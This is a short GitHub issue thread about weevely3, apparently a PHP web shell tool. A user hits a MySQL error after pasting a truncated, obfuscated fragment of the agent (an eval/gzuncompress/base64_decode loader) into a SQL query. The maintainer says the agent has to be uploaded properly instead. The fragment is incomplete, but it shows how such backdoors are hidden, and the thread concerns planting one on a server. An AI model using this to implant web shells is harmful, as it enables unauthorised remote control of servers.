### ISSUE TITLE
#1054 - Unknown column '_' in 'field list' 

### ISSUE THREAD

**Issue by SlashNetwork** [epinna/weevely3#74]
I got this error when trying to upload the agent.php.
SQL query: Documentation

select "<?php
$a='$M;e=M;stM;rpos($s[$i],M;$f);if($e)M;{M;$k=$kM;h.$kf;M;ob_starM;t();@eM;val(@gzuncM;ompressM;(@x(M;@bM;ase64_decodM;eM;(pre';
$P='g_M;replaM;ce(arrM;ay("/_/","M;

MySQL said: Documentation
#1054 - Unknown column '_' in 'field list'
![image](https://user-images.githubusercontent.com/5793518/31828511-5b8b60a8-b5b2-11e7-998c-36f4f493d1db.png)

**Comment by epinna** [comment]
From what I can see, Weevely hasn't been uploaded remotely but it is used in a SQL statement. This is not how it works, you need to find a way to upload the agent.php properly.
